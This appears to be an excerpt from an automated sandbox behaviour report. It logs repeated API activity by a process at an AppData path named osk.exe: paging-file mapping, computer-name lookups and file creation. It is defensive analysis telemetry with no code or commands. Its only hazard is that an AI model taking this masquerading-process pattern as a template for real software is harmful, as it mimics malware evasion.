| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
